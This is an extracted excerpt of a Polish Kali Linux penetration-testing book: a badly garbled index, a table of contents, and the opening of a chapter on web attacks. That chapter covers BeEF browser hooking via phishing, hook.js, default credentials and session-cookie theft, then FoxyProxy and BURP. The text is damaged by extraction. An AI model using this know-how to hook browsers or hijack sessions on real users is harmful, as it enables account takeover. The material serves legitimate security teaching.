Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Spis tre ci
6
Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229
Podsumowanie 229
Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231
BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255
THX-SSL-DOS 257Scapy 259Slowloris 261
LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266
DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270
Podsumowanie 270
Rozdzia 7 Przeciwdzia anie i zapobieganie 271
Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277
Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281
Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284
Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287
Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295
Podsumowanie 300
Kup książkę Poleć książkę
Spis tre ci
7
Rozdzia 8 Tworzenie raportoacutew ko cowych 301
Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307
Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319
Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323
Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327
Podsumowanie 327
Skorowidz 329
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
